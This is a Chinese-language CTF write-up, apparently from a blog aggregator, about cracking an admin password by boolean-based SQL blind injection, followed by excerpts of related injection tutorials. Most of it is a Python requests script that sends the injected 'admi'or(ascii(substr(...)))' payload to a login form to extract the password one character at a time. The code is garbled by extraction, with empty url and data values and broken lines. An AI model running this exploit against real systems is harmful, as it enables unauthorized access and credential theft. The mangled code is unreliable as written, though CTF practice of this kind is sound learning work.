解題思路:我用使用者名稱admin,密碼123456,提示密碼錯誤
我用使用者名稱admina,密碼123456,提示使用者名稱錯誤,說明使用者名稱是admin
我的字典sql盲注無法破解密碼,於是我在網上找了乙個大佬寫的pycharm指令碼(記得安裝requests庫和改url)
import requests
import time
url =
""headers =
with requests.session(
)as s:
database =
"passwd:"
s.keep_alive =
false
s.adapters.default_retries =
5for i in
range(1
,32):
for j in
range(48
,128):
sql =
'admi\'or((ascii(substr((select(password))from()))-))--\''
.format
(i, j)
data =
try:
res = s.post(url, data=data, timeout=
5, headers=headers)
except
: time.sleep(2)
res = s.post(url, data=data, timeout=
5, headers=headers)
if'username does not exist'
in res.text:
database +=
chr(j)
print
(database)
break
res.close(
)
滲透測試 SQL盲注基於布林的盲注
普通sql注入和sql盲注的區別 sql盲注的思路 基於時間的盲注 通過構造真or假判斷條件的sql語句,且sql語句中根據需要聯合使用sleep 函式一同向伺服器傳送請求,觀察伺服器響應結果是否會執行所設定時間的延遲響應,以此來判斷所構造條件的真or假 若執行sleep延遲,則表示當前設定的判斷條...
CTF 基於布林的SQL盲注
ctf學習 基於布林的sql盲注 提 示 基於布林的sql盲注 描 述 sql注入 訪問題目,又是乙個web login登陸介面,根據提示可以大概猜測是乙個sql post注入題。123 當username admin時提示password error 可知使用者名為 admin 對username...
SQL注入 布林盲注
可以進行sql注入,但是不能通過sql注入漏洞看到資料庫中的資訊,但是可以通過真假判斷資料庫中的資訊 布林盲注的方法 構造邏輯判斷語句,判斷資訊的真假,取出所有的真值 以less 8為例 還是老步驟,初步判斷是否存在sql注入漏洞 返回you are in 無返回 可以初步判斷存在sql注入漏洞,並...